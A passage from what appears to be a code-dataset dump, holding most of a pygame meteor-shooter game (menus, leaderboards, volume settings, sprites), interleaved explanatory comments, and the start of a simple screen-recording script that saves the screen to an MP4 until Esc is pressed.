player_img.set_colorkey(BLACK)\n screen.blit(player_img, (30, 50))\n\n if skin2:\n player_img2.set_colorkey(BLACK)\n screen.blit(player_img2, (190, 50))\n else:\n pygame.draw.rect(screen, BLACK, ((182, 40), (126, 100)))\n screen.blit(lock_img, (212, 55))\n if skin3:\n player_img3.set_colorkey(BLACK)\n screen.blit(player_img3, (350, 50))\n else:\n pygame.draw.rect(screen, BLACK, ((340, 40), (120, 100)))\n screen.blit(lock_img, (367, 55))\n\n pygame.draw.rect(screen, WHITE, ((20, 40), (120, 100)), 3)\n pygame.draw.rect(screen, WHITE, ((182, 40), (126, 100)), 3)\n pygame.draw.rect(screen, WHITE, ((340, 40), (120, 100)), 3)\n\n pygame.draw.rect(screen, WHITE, ((150, 250), (150, 70)), 3)\n pygame.draw.rect(screen, WHITE, ((150, 350), (150, 70)), 3)\n\n if 140 >= mouse[0] >= 20 and 140 >= mouse[1] >= 40 and click[0] == 1 and skin1:\n select1 = True\n select2 = False\n select3 = False\n player.image = skin1\n elif 308 >= mouse[0] >= 182 and 140 >= mouse[1] >= 40 and click[0] == 1 and skin2:\n select1 = False\n select2 = True\n select3 = False\n player.image = skin2\n elif 460 >= mouse[0] >= 340 and 140 >= mouse[1] >= 40 and click[0] == 1 and skin3:\n select1 = False\n select2 = False\n select3 = True\n player.image = skin3\n elif click[0] == 1 and not select4:\n select1 = select2 = select3 = False\n\n if 297 >= mouse[0] >= 152 and 317 >= mouse[1] >= 252:\n select4 = True\n else:\n select4 = False\n\n if 297 >= mouse[0] >= 152 and 417 >= mouse[1] >= 353:\n select5 = True\n else:\n 
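# Sketch of an alternative return shape for ladders_check() above (a
# suggestion, not in the original): a namedtuple makes the twelve positional
# stats self-describing. Note the function returns the personal bests in
# (daily, monthly, weekly) order while ladders() reads stats[1] as weekly and
# stats[2] as monthly, so the current weekly and monthly personal bests end up
# swapped on screen; named fields would surface that mismatch immediately.
from collections import namedtuple

LadderStats = namedtuple("LadderStats", [
    "self_daily", "self_monthly", "self_weekly",
    "top5_daily", "top5_weekly", "top5_monthly",
    "self_past_daily", "self_past_weekly", "self_past_monthly",
    "top5_past_daily", "top5_past_weekly", "top5_past_monthly",
])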
select5 = False\n\n if select1:\n pygame.draw.rect(screen, BLACK, ((17, 36), (126, 108)), 3)\n player.image = pygame.transform.scale(player_img, (50, 35))\n if select2:\n pygame.draw.rect(screen, BLACK, ((179, 36), (132, 108)), 3)\n player.image = pygame.transform.scale(player_img2, (50, 35))\n if select3:\n pygame.draw.rect(screen, BLACK, ((337, 36), (126, 108)), 3)\n player.image = pygame.transform.scale(player_img3, (50, 35))\n if select4:\n pygame.draw.rect(screen, GRAY_SELECTION, ((152, 252), (146, 66)))\n if select5:\n pygame.draw.rect(screen, GRAY_SELECTION, ((152, 352), (146, 66)))\n\n screen.blit(choose_text, [65, 150])\n screen.blit(start_text, [158, 245])\n screen.blit(back_text, [167, 345])\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1 and select4 and (select1 or select2 or select3):\n for s in mobs.sprites():\n s.kill()\n for s in bullets.sprites():\n s.kill()\n for s in explosions.sprites():\n s.kill()\n player.rect.centerx = WIDTH // 2\n player.rect.bottom = HEIGHT - 10\n spawn()\n skin_choice = False\n dead = False\n pts = 0\n running = True\n elif event.type == pygame.MOUSEBUTTONUP and event.button == 1 and select5:\n skin_choice = False\n menu()\n\n pygame.display.update()\n clock.tick(60)\n\n\ndef ladders():\n looking_stats = True\n select1 = True\n select2 = False\n stats = ladders_check()\n self_md = stats[0]\n self_pmd = stats[6]\n self_mw = stats[1]\n self_pmw = stats[7]\n self_mm = stats[2]\n self_pmm = stats[8]\n top5_d = stats[3]\n top5_pd = stats[9]\n top5_w = stats[4]\n top5_pw = stats[10]\n top5_m = stats[5]\n top5_pm = stats[11]\n select3 = True\n select4 = False\n select5 = False\n global p1_img\n global p2_img\n global p3_img\n global pts_img\n p1_img.set_colorkey(BLACK)\n p2_img.set_colorkey(BLACK)\n p3_img.set_colorkey(BLACK)\n pts_img.set_colorkey(BLACK)\n while looking_stats:\n ladders_text = mediumtext.render(\"Ladders\", True, WHITE)\n screen.fill(GRAY)\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n cl_text = smalltext.render(\"Current ladder\", True, WHITE)\n pl_text = smalltext.render(\"Past ladder\", True, WHITE)\n daily_text = smallmediumtext.render(\"Daily\", True, WHITE)\n weekly_text = smallmediumtext.render(\"Weekly\", True, WHITE)\n monthly_text = smallmediumtext.render(\"Monthly\", True, WHITE)\n self_nick_text = smalltext.render(str(player.nickname), True, WHITE)\n\n print(mouse)\n\n pygame.draw.rect(screen, WHITE, (10, 73, 225, 35), 2) # boxes of ladder_names\n pygame.draw.rect(screen, WHITE, (245, 73, 225, 35), 2)\n\n pygame.draw.rect(screen, WHITE, (10, 120, 146, 50), 2)\n pygame.draw.rect(screen, WHITE, (166, 120, 146, 50), 2)\n pygame.draw.rect(screen, WHITE, (322, 120, 146, 50), 2)\n\n pygame.draw.rect(screen, WHITE, (10, 185, 460, 40), 2) # top players of ladder\n pygame.draw.rect(screen, WHITE, (10, 255, 460, 40), 2)\n pygame.draw.rect(screen, WHITE, (10, 310, 460, 40), 2)\n pygame.draw.rect(screen, WHITE, (10, 365, 460, 40), 2)\n pygame.draw.rect(screen, WHITE, (10, 420, 460, 40), 2)\n pygame.draw.rect(screen, WHITE, (10, 475, 460, 40), 2)\n\n screen.blit(pts_img, (355, 190))\n screen.blit(pts_img, (355, 260))\n screen.blit(pts_img, (355, 316))\n screen.blit(pts_img, (355, 371))\n screen.blit(pts_img, (355, 425))\n screen.blit(pts_img, (355, 481))\n\n screen.blit(p1_img, (16, 261))\n screen.blit(p2_img, (16, 316))\n screen.blit(p3_img, (16, 371))\n\n if 316 >= mouse[0] >= 167 and 572 >= mouse[1] >= 
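# Note on the skin-selection logic above: skin1/skin2/skin3 are booleans set by
# skin_check(), so a line like 'player.image = skin2' assigns True rather than
# a surface; the sprite is only really set by the later
# 'player.image = pygame.transform.scale(player_img2, (50, 35))' branches,
# which is why the game still renders the chosen ship correctly.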
534:\n menu_text = mediumtext.render(\"MENU\", True, BLUE)\n screen.blit(menu_text, [167, 515])\n else:\n menu_text = mediumtext.render(\"MENU\", True, LIGHT_BLUE)\n screen.blit(menu_text, [167, 515])\n\n screen.blit(ladders_text, (145, 0))\n\n screen.blit(cl_text, (36, 73))\n screen.blit(pl_text, (288, 73))\n screen.blit(daily_text, (42, 115))\n screen.blit(weekly_text, (177, 115))\n screen.blit(monthly_text, (330, 115))\n\n if 235 >= mouse[0] >= 10 and 108 >= mouse[1] >= 73 and click[0] == 1:\n select1 = True\n select2 = False\n elif 470 >= mouse[0] >= 245 and 108 >= mouse[1] >= 73 and click[0] == 1:\n select2 = True\n select1 = False\n\n if 156 >= mouse[0] >= 10 and 170 >= mouse[1] >= 120 and click[0] == 1:\n select3 = True\n select4 = False\n select5 = False\n elif 312 >= mouse[0] >= 166 and 170 >= mouse[1] >= 120 and click[0] == 1:\n select3 = False\n select4 = True\n select5 = False\n elif 468 >= mouse[0] >= 322 and 170 >= mouse[1] >= 120 and click[0] == 1:\n select3 = False\n select4 = False\n select5 = True\n\n if select1:\n pygame.draw.rect(screen, GRAY_SELECTION, (8, 71, 230, 40), 3)\n elif select2:\n pygame.draw.rect(screen, GRAY_SELECTION, (243, 71, 230, 40), 3)\n if select3 and select1:\n pygame.draw.rect(screen, GRAY_SELECTION, (8, 118, 151, 55), 3)\n self_d_text = smalltext.render(str(self_md[0]), True, WHITE)\n top1_d_text = smalltext.render(str(top5_d[0][0]), True, WHITE)\n pts1_text = smalltext.render(str(top5_d[0][1]), True, WHITE)\n\n top2_d_text = smalltext.render(str(top5_d[1][0]), True, WHITE)\n pts2_text = smalltext.render(str(top5_d[1][1]), True, WHITE)\n\n top3_d_text = smalltext.render(str(top5_d[2][0]), True, WHITE)\n pts3_text = smalltext.render(str(top5_d[2][1]), True, WHITE)\n\n top4_d_text = smalltext.render(str(top5_d[3][0]), True, WHITE)\n pts4_text = smalltext.render(str(top5_d[3][1]), True, WHITE)\n\n top5_d_text = smalltext.render(str(top5_d[4][0]), True, WHITE)\n pts5_text = smalltext.render(str(top5_d[4][1]), True, WHITE)\n\n screen.blit(self_nick_text, [18, 188]) # nicks\n screen.blit(top1_d_text, [50, 256])\n screen.blit(top2_d_text, [50, 311])\n screen.blit(top3_d_text, [50, 363])\n screen.blit(top4_d_text, [50, 419])\n screen.blit(top5_d_text, [50, 474])\n\n screen.blit(self_d_text, [390, 187]) # pts\n screen.blit(pts1_text, [390, 258])\n screen.blit(pts2_text, [390, 312])\n screen.blit(pts3_text, [390, 366])\n screen.blit(pts4_text, [390, 421])\n screen.blit(pts5_text, [390, 475])\n\n elif select4 and select1:\n pygame.draw.rect(screen, GRAY_SELECTION, (164, 118, 151, 55), 3)\n self_w_text = smalltext.render(str(self_mw[0]), True, WHITE)\n top1_w_text = smalltext.render(str(top5_w[0][0]), True, WHITE)\n pts1_text = smalltext.render(str(top5_w[0][1]), True, WHITE)\n\n top2_w_text = smalltext.render(str(top5_w[1][0]), True, WHITE)\n pts2_text = smalltext.render(str(top5_w[1][1]), True, WHITE)\n\n top3_w_text = smalltext.render(str(top5_w[2][0]), True, WHITE)\n pts3_text = smalltext.render(str(top5_w[2][1]), True, WHITE)\n\n top4_w_text = smalltext.render(str(top5_w[3][0]), True, WHITE)\n pts4_text = smalltext.render(str(top5_w[3][1]), True, WHITE)\n\n top5_w_text = smalltext.render(str(top5_w[4][0]), True, WHITE)\n pts5_text = smalltext.render(str(top5_w[4][1]), True, WHITE)\n\n screen.blit(self_nick_text, [18, 188]) # nicks\n screen.blit(top1_w_text, [50, 256])\n screen.blit(top2_w_text, [50, 311])\n screen.blit(top3_w_text, [50, 363])\n screen.blit(top4_w_text, [50, 419])\n screen.blit(top5_w_text, [50, 474])\n\n screen.blit(self_w_text, [390, 
187]) # pts\n screen.blit(pts1_text, [390, 258])\n screen.blit(pts2_text, [390, 312])\n screen.blit(pts3_text, [390, 366])\n screen.blit(pts4_text, [390, 421])\n screen.blit(pts5_text, [390, 475])\n\n elif select5 and select1:\n pygame.draw.rect(screen, GRAY_SELECTION, (320, 118, 151, 55), 3)\n self_m_text = smalltext.render(str(self_mm[0]), True, WHITE)\n top1_m_text = smalltext.render(str(top5_m[0][0]), True, WHITE)\n pts1_text = smalltext.render(str(top5_m[0][1]), True, WHITE)\n\n top2_m_text = smalltext.render(str(top5_m[1][0]), True, WHITE)\n pts2_text = smalltext.render(str(top5_m[1][1]), True, WHITE)\n\n top3_m_text = smalltext.render(str(top5_m[2][0]), True, WHITE)\n pts3_text = smalltext.render(str(top5_m[2][1]), True, WHITE)\n\n top4_m_text = smalltext.render(str(top5_m[3][0]), True, WHITE)\n pts4_text = smalltext.render(str(top5_m[3][1]), True, WHITE)\n\n top5_m_text = smalltext.render(str(top5_m[4][0]), True, WHITE)\n pts5_text = smalltext.render(str(top5_m[4][1]), True, WHITE)\n\n screen.blit(self_nick_text, [18, 188]) # nicks\n screen.blit(top1_m_text, [50, 256])\n screen.blit(top2_m_text, [50, 311])\n screen.blit(top3_m_text, [50, 363])\n screen.blit(top4_m_text, [50, 419])\n screen.blit(top5_m_text, [50, 474])\n\n screen.blit(self_m_text, [390, 187]) # pts\n screen.blit(pts1_text, [390, 258])\n screen.blit(pts2_text, [390, 312])\n screen.blit(pts3_text, [390, 366])\n screen.blit(pts4_text, [390, 421])\n screen.blit(pts5_text, [390, 475])\n\n if select3 and select2:\n pygame.draw.rect(screen, GRAY_SELECTION, (8, 118, 151, 55), 3)\n self_d_text = smalltext.render(str(self_pmd[0]), True, WHITE)\n top1_d_text = smalltext.render(str(top5_pd[0][0]), True, WHITE)\n pts1_text = smalltext.render(str(top5_pd[0][1]), True, WHITE)\n\n top2_d_text = smalltext.render(str(top5_pd[1][0]), True, WHITE)\n pts2_text = smalltext.render(str(top5_pd[1][1]), True, WHITE)\n\n top3_d_text = smalltext.render(str(top5_pd[2][0]), True, WHITE)\n pts3_text = smalltext.render(str(top5_pd[2][1]), True, WHITE)\n\n top4_d_text = smalltext.render(str(top5_pd[3][0]), True, WHITE)\n pts4_text = smalltext.render(str(top5_pd[3][1]), True, WHITE)\n\n top5_d_text = smalltext.render(str(top5_pd[4][0]), True, WHITE)\n pts5_text = smalltext.render(str(top5_pd[4][1]), True, WHITE)\n\n screen.blit(self_nick_text, [18, 188]) # nicks\n screen.blit(top1_d_text, [50, 256])\n screen.blit(top2_d_text, [50, 311])\n screen.blit(top3_d_text, [50, 363])\n screen.blit(top4_d_text, [50, 419])\n screen.blit(top5_d_text, [50, 474])\n\n screen.blit(self_d_text, [390, 187]) # pts\n screen.blit(pts1_text, [390, 258])\n screen.blit(pts2_text, [390, 312])\n screen.blit(pts3_text, [390, 366])\n screen.blit(pts4_text, [390, 421])\n screen.blit(pts5_text, [390, 475])\n\n elif select4 and select2:\n pygame.draw.rect(screen, GRAY_SELECTION, (164, 118, 151, 55), 3)\n self_w_text = smalltext.render(str(self_pmw[0]), True, WHITE)\n top1_w_text = smalltext.render(str(top5_pw[0][0]), True, WHITE)\n pts1_text = smalltext.render(str(top5_pw[0][1]), True, WHITE)\n\n top2_w_text = smalltext.render(str(top5_pw[1][0]), True, WHITE)\n pts2_text = smalltext.render(str(top5_pw[1][1]), True, WHITE)\n\n top3_w_text = smalltext.render(str(top5_pw[2][0]), True, WHITE)\n pts3_text = smalltext.render(str(top5_pw[2][1]), True, WHITE)\n\n top4_w_text = smalltext.render(str(top5_pw[3][0]), True, WHITE)\n pts4_text = smalltext.render(str(top5_pw[3][1]), True, WHITE)\n\n top5_w_text = smalltext.render(str(top5_pw[4][0]), True, WHITE)\n pts5_text = 
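# Hypothetical helper (an illustration, not in the original) that collapses the
# six nearly identical daily/weekly/monthly branches of ladders(): each branch
# differs only in which top-5 rows and personal best it shows, so the blitting
# can be shared. Row y-offsets are approximated; the original nudges each
# points label by 1-3 px.
def draw_ladder_column(screen, font, self_points, top5_rows):
    screen.blit(font.render(str(self_points), True, WHITE), [390, 187])
    for (nick, points), y in zip(top5_rows, (256, 311, 363, 419, 474)):
        screen.blit(font.render(str(nick), True, WHITE), [50, y])
        screen.blit(font.render(str(points), True, WHITE), [390, y + 2])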
smalltext.render(str(top5_pw[4][1]), True, WHITE)\n\n screen.blit(self_nick_text, [18, 188]) # nicks\n screen.blit(top1_w_text, [50, 256])\n screen.blit(top2_w_text, [50, 311])\n screen.blit(top3_w_text, [50, 363])\n screen.blit(top4_w_text, [50, 419])\n screen.blit(top5_w_text, [50, 474])\n\n screen.blit(self_w_text, [390, 187]) # pts\n screen.blit(pts1_text, [390, 258])\n screen.blit(pts2_text, [390, 312])\n screen.blit(pts3_text, [390, 366])\n screen.blit(pts4_text, [390, 421])\n screen.blit(pts5_text, [390, 475])\n\n elif select5 and select2:\n pygame.draw.rect(screen, GRAY_SELECTION, (320, 118, 151, 55), 3)\n self_m_text = smalltext.render(str(self_pmm[0]), True, WHITE)\n top1_m_text = smalltext.render(str(top5_pm[0][0]), True, WHITE)\n pts1_text = smalltext.render(str(top5_pm[0][1]), True, WHITE)\n\n top2_m_text = smalltext.render(str(top5_pm[1][0]), True, WHITE)\n pts2_text = smalltext.render(str(top5_pm[1][1]), True, WHITE)\n\n top3_m_text = smalltext.render(str(top5_pm[2][0]), True, WHITE)\n pts3_text = smalltext.render(str(top5_pm[2][1]), True, WHITE)\n\n top4_m_text = smalltext.render(str(top5_pm[3][0]), True, WHITE)\n pts4_text = smalltext.render(str(top5_pm[3][1]), True, WHITE)\n\n top5_m_text = smalltext.render(str(top5_pm[4][0]), True, WHITE)\n pts5_text = smalltext.render(str(top5_pm[4][1]), True, WHITE)\n\n screen.blit(self_nick_text, [18, 188]) # nicks\n screen.blit(top1_m_text, [50, 256])\n screen.blit(top2_m_text, [50, 311])\n screen.blit(top3_m_text, [50, 363])\n screen.blit(top4_m_text, [50, 419])\n screen.blit(top5_m_text, [50, 474])\n\n screen.blit(self_m_text, [390, 187]) # pts\n screen.blit(pts1_text, [390, 258])\n screen.blit(pts2_text, [390, 312])\n screen.blit(pts3_text, [390, 366])\n screen.blit(pts4_text, [390, 421])\n screen.blit(pts5_text, [390, 475])\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n if 316 >= mouse[0] >= 167 and 572 >= mouse[1] >= 534:\n looking_stats = False\n menu()\n\n clock.tick(60)\n pygame.display.update()\n\n\ndef score(pts):\n pts_text = smalltext.render(\"Score: \" + str(pts), True, YELLOW)\n screen.blit(pts_text, [0, 0])\n\n\ndef settings():\n global gear\n global volume\n global target\n global paused\n gear = True\n while gear:\n screen.fill(GRAY)\n volume0_pos = 140\n volume100_pos = 340\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n if paused is True and 285 >= mouse[0] >= 157 and 357 >= mouse[1] >= 317:\n back_text = mediumtext.render(\"BACK\", True, BLUE)\n screen.blit(back_text, [155, 300])\n elif paused is True:\n back_text = mediumtext.render(\"BACK\", True, LIGHT_BLUE)\n screen.blit(back_text, [155, 300])\n if 307 >= mouse[0] >= 157 and 457 >= mouse[1] >= 417 and not paused:\n About = mediumtext.render(\"MENU\", True, BLUE)\n screen.blit(About, [155, 400])\n elif not paused:\n About = mediumtext.render(\"MENU\", True, LIGHT_BLUE)\n screen.blit(About, [155, 400])\n\n sound_text = mediumtext.render(\"VOLUME\", True, LIGHT_BLUE)\n\n screen.blit(sound_text, [130, 25])\n\n pygame.draw.rect(screen, WHITE, ((140, 180), (200, 3)))\n\n if volume100_pos >= mouse[0] >= volume0_pos and 170 <= mouse[1] <= 190 and click[0] == 1:\n target = True\n elif click[0] == 0:\n target = False\n\n if target and volume100_pos >= mouse[0] >= volume0_pos:\n pygame.draw.circle(screen, WHITE, (mouse[0], 180), 10)\n volume = (mouse[0] - volume0_pos) // 2\n\n elif target and mouse[0] < volume0_pos:\n 
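# Worked numbers for the volume slider in settings() (values taken from the
# code): the track spans volume0_pos=140 to volume100_pos=340, i.e. 200 px for
# 0-100, so volume = (x - 140) // 2, and the idle handle is redrawn at
# x = volume * 2 + 140.
assert (240 - 140) // 2 == 50    # handle at mid-track -> 50 %
assert (340 - 140) // 2 == 100   # handle at the right end -> 100 %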
pygame.draw.circle(screen, WHITE, (volume0_pos, 180), 10)\n volume = 0\n elif target and mouse[0] > volume100_pos:\n pygame.draw.circle(screen, WHITE, (volume100_pos, 180), 10)\n volume = 100\n else:\n pygame.draw.circle(screen, WHITE, (volume * 2 + volume0_pos, 180), 10)\n\n if 100 > volume >= 10:\n volume_percentage = mediumtext.render(\" \" + str(volume) + \"%\", True, LIGHT_BLUE)\n\n elif volume < 10:\n volume_percentage = mediumtext.render(\" \" + str(volume) + \"%\", True, LIGHT_BLUE)\n\n elif volume == 100:\n volume_percentage = mediumtext.render(str(volume) + \"%\", True, LIGHT_BLUE)\n\n screen.blit(volume_percentage, [180, 85])\n\n crash_sound.set_volume(0.08 * (0.01 * volume))\n player_crashed.set_volume(0.3 * (0.01 * volume))\n laser_sound.set_volume(0.2 * (0.01 * volume))\n pygame.mixer.music.set_volume(0.2 * (0.01 * volume))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n if 335 >= mouse[0] >= 155 and 457 >= mouse[1] >= 417 and not paused:\n gear = False\n paused = False\n menu()\n if 285 >= mouse[0] >= 157 and 357 >= mouse[1] >= 317 and paused is True:\n gear = False\n pause()\n\n pygame.display.flip()\n pygame.display.update()\n clock.tick(60)\n\n\ndef player_statistics():\n stats = True\n stats_tuple = show_stats()\n max_points_text = smalltext.render('Maximum points:' + ' ' + str(stats_tuple[0]), True, WHITE)\n total_points_text = smalltext.render('Total points:' + ' ' + str(stats_tuple[1]), True, WHITE)\n games_played_text = smalltext.render('Games played:' + ' ' + str(stats_tuple[2]), True, WHITE)\n max_daily_points_text = smalltext.render('Maximum daily points:' + ' ' + str(stats_tuple[3]), True, WHITE)\n max_weekly_points_text = smalltext.render('Maximum weekly points:' + ' ' + str(stats_tuple[4]), True, WHITE)\n max_monthly_points_text = smalltext.render('Maximum monthly points:' + ' ' + str(stats_tuple[5]), True, WHITE)\n while stats:\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n print(mouse)\n screen.fill(GRAY)\n\n if 316 >= mouse[0] >= 167 and 457 >= mouse[1] >= 417:\n menu_text = mediumtext.render(\"MENU\", True, BLUE)\n screen.blit(menu_text, [167, 400])\n else:\n menu_text = mediumtext.render(\"MENU\", True, LIGHT_BLUE)\n screen.blit(menu_text, [167, 400])\n\n pygame.draw.rect(screen, WHITE, (63, 20, 360, 320), 3)\n\n screen.blit(max_points_text, [73, 25])\n screen.blit(total_points_text, [73, 75])\n screen.blit(games_played_text, [73, 125])\n screen.blit(max_daily_points_text, [73, 175])\n screen.blit(max_weekly_points_text, [73, 225])\n screen.blit(max_monthly_points_text, [73, 275])\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.MOUSEBUTTONUP and event.button == 1:\n if 316 >= mouse[0] >= 167 and 457 >= mouse[1] >= 417:\n stats = False\n menu()\n\n pygame.display.update()\n clock.tick(60)\n\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self):\n click = pygame.mouse.get_pressed()\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.transform.scale(player_img, (50, 35))\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.radius = 21\n # pygame.draw.circle(self.image, RED, self.rect.center, self.radius)\n # hitboxes CBEPXY\n self.rect.centerx = WIDTH // 2\n self.nickname = ''\n self.rect.bottom = HEIGHT - 10\n self.speedx = 0\n\n def update(self):\n self.speedx = 0\n keystate = pygame.key.get_pressed()\n if 
keystate[pygame.K_LEFT] or keystate[pygame.K_a]:\n self.speedx = -5\n if keystate[pygame.K_RIGHT] or keystate[pygame.K_d]:\n self.speedx = 5\n self.rect.x += self.speedx\n if self.rect.right > WIDTH:\n self.rect.right = WIDTH\n if self.rect.left < 0:\n self.rect.left = 0\n\n def shoot(self):\n bullet = Bullet(self.rect.centerx, self.rect.top)\n all_sprites.add(bullet)\n bullets.add(bullet)\n\n\nclass Mob(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image_orig = meteor_img\n self.image_orig.set_colorkey(BLACK)\n self.image = self.image_orig.copy()\n self.rect = self.image.get_rect()\n self.radius = int(self.rect.width * .85 / 2)\n # pygame.draw.circle(self.image, RED, self.rect.center, self.radius)\n self.rect.x = random.randrange(WIDTH - self.rect.width)\n self.rect.y = random.randrange(-100, -40)\n self.speedy = random.randrange(sx, sy + 7)\n self.speedx = random.randrange(sx - 6, sy + 2)\n self.rot = 0\n self.rot_speed = random.randrange(-8, 8)\n self.last_update = pygame.time.get_ticks()\n\n def rotate(self):\n now = pygame.time.get_ticks()\n if now - self.last_update > 50:\n self.last_update = now\n self.rot = (self.rot + self.rot_speed) % 360\n new_image = pygame.transform.rotate(self.image_orig, self.rot)\n old_center = self.rect.center\n self.image = new_image\n self.rect = self.image.get_rect()\n self.rect.center = old_center\n\n def update(self):\n self.rotate()\n self.rect.x += self.speedx\n self.rect.y += self.speedy\n if self.rect.top > HEIGHT + 10 or self.rect.left < -25 or self.rect.right > WIDTH + 20:\n self.rect.x = random.randrange(WIDTH - self.rect.width)\n self.rect.y = random.randrange(-100, -40)\n self.speedy = random.randrange(sx, sy + 7)\n\n\nclass Explosion(pygame.sprite.Sprite):\n def __init__(self, center, size):\n pygame.sprite.Sprite.__init__(self)\n self.size = size\n self.image = explosion_anim[self.size][0]\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.frame = 0\n self.last_update = pygame.time.get_ticks()\n self.frame_rate = 40\n\n def update(self):\n explosions.add(self)\n now = pygame.time.get_ticks()\n if now - self.last_update > self.frame_rate:\n self.last_update = now\n self.frame += 1\n if self.frame == len(explosion_anim[self.size]):\n self.kill()\n else:\n center = self.rect.center\n self.image = explosion_anim[self.size][self.frame]\n self.rect = self.image.get_rect()\n self.rect.center = center\n\n\nclass Bullet(pygame.sprite.Sprite):\n def __init__(self, x, y):\n pygame.sprite.Sprite.__init__(self)\n self.image = bullet_img\n self.image.set_colorkey(BLACK)\n self.rect = self.image.get_rect()\n self.rect.bottom = y\n self.rect.centerx = x\n self.speedy = -10\n\n def update(self):\n self.rect.y += self.speedy\n # kill if it moves out from screen\n if self.rect.bottom < 0:\n self.kill()\n\n\nfor i in range(9):\n filename = \"regularExplosion0{}.png\".format(i)\n img = pygame.image.load(filename).convert()\n img.set_colorkey(BLACK)\n img_lg = pygame.transform.scale(img, (75, 75))\n explosion_anim[\"lg\"].append(img_lg)\n img_sm = pygame.transform.scale(img, (32, 32))\n explosion_anim[\"sm\"].append(img_sm)\n\n# \nall_sprites = pygame.sprite.Group()\nmobs = pygame.sprite.Group()\nplayer = Player()\nall_sprites.add(player)\nbullets = pygame.sprite.Group()\nexplosions = pygame.sprite.Group()\n\n\n# \n\n\ndef spawn():\n for i in range(meteors):\n m = Mob()\n all_sprites.add(m)\n mobs.add(m)\n\n\nspawn()\nauthorization_window()\n# menu()\n\nwhile running:\n # keep loop running at the 
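# The staged difficulty in the main loop below can be read as a table (same
# numbers as the chained ifs; a data-driven sketch, not original code): higher
# scores lower the in-flight bullet cap, while sy is bumped once per stage via
# the sy + sx checkpoint checks.
SHOOT_LIMITS = {50: 8, 100: 7, 150: 6, 200: 5, 250: 4, 300: 3}  # pts -> shootlimit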
right speed\n clock.tick(FPS)\n # Process input (events)\n for event in pygame.event.get():\n click = pygame.mouse.get_pressed()\n # check for game over\n if event.type == pygame.QUIT:\n running = False\n\n elif event.type == pygame.MOUSEBUTTONDOWN:\n if click[0] == 1:\n player.shoot()\n\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE and len(bullets) < shootlimit: # shooting here\n player.shoot()\n pygame.mixer.Sound.play(laser_sound)\n\n if event.key == pygame.K_ESCAPE:\n pause()\n\n if 100 > pts >= 50:\n shootlimit = 8\n if sy + sx == 2:\n sy += 2\n if 150 > pts >= 100:\n shootlimit = 7\n if sy + sx == 4:\n sy += 2\n if 200 > pts >= 150:\n shootlimit = 6\n if sy + sx == 6:\n sy += 1\n if 250 > pts >= 200:\n shootlimit = 5\n if sy + sx == 7:\n sy += 1\n if 300 > pts >= 250:\n shootlimit = 4\n if sy + sx == 9:\n sy += 1\n if pts >= 300:\n shootlimit = 3\n if sy + sx == 11:\n sy += 2\n # Update\n pygame.display.update()\n all_sprites.update()\n # check to see if a bullet hit a mob\n hits = pygame.sprite.groupcollide(mobs, bullets, True, True)\n\n for hit in hits:\n m = Mob()\n all_sprites.add(m)\n mobs.add(m)\n pygame.mixer.Sound.play(crash_sound)\n pts += 1\n expl = Explosion(hit.rect.center, \"lg\")\n all_sprites.add(expl)\n # check to see if a mob hit the player\n hits = pygame.sprite.spritecollide(player, mobs, False, pygame.sprite.collide_circle)\n if hits:\n update_stats(pts)\n pygame.mixer.Sound.play(player_crashed)\n running = False\n time.sleep(1)\n died()\n\n # Draw and render\n screen.blit(background, background_rect)\n all_sprites.draw(screen)\n score(pts)\n # helpful thing\n pygame.display.flip()\n\n","repo_name":"dshumilin03/apocalypse_game","sub_path":"proekt.py","file_name":"proekt.py","file_ext":"py","file_size_in_byte":60129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"388407092","text":"# importing the required packages \r\nimport pyautogui \r\nfrom PIL import ImageGrab\r\nimport cv2 \r\nimport numpy as np \r\nimport keyboard\r\n\r\n# Specify resolution \r\nresolution = pyautogui.size()\r\n\r\n# Specify video codec \r\ncodec = cv2.VideoWriter_fourcc(*'mp4v')\r\n\r\n\r\n# Specify name of Output file \r\nfilename = \"Recording.mp4\"\r\n\r\n# Specify frames rate. 
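# One caveat about the conversion a few lines below (a reading based on the
# libraries' documented behavior): ImageGrab.grab() returns RGB pixels while
# cv2.VideoWriter.write() expects BGR frames, so cv2.cvtColor(frame,
# cv2.COLOR_BGR2RGB) is effectively performing the RGB -> BGR swap needed for
# writing; the inline comment states the direction the other way around.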
We can choose any \r\n# value and experiment with it \r\nfps = 30.0\r\n\r\n\r\n# Creating a VideoWriter object \r\nout = cv2.VideoWriter(filename, codec, fps, resolution) \r\n\r\n# check if a esc is pressed\r\nprint(keyboard.is_pressed('esc'))\r\nwhile keyboard.is_pressed('esc')!=True: \r\n\t# Take screenshot using PyAutoGUI \r\n\timg = ImageGrab.grab(bbox=None)\r\n\r\n\t# Convert the screenshot to a numpy array \r\n\tframe = np.array(img) \r\n\r\n\t# Convert it from BGR(Blue, Green, Red) to \r\n\t# RGB(Red, Green, Blue) \r\n\tframe = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n\tcurrentMouseX, currentMouseY = pyautogui.position() \r\n\tframe = cv2.circle(frame, (currentMouseX, currentMouseY), 15, (0,255,0), -1)\r\n\t# Write it to the output file \r\n\tout.write(frame) \r\n\t\r\n\t# Optional: Display the recording screen \r\n\t# cv2.imshow('Live', frame) \r\n\t\r\n\t# Stop recording when we press 'q' \r\n\t# if cv2.waitKey(1) == ord('q'): \r\n\t# \tbreak\r\n\r\n# Release the Video writer \r\nout.release() \r\n\r\n# Destroy all windows \r\n# 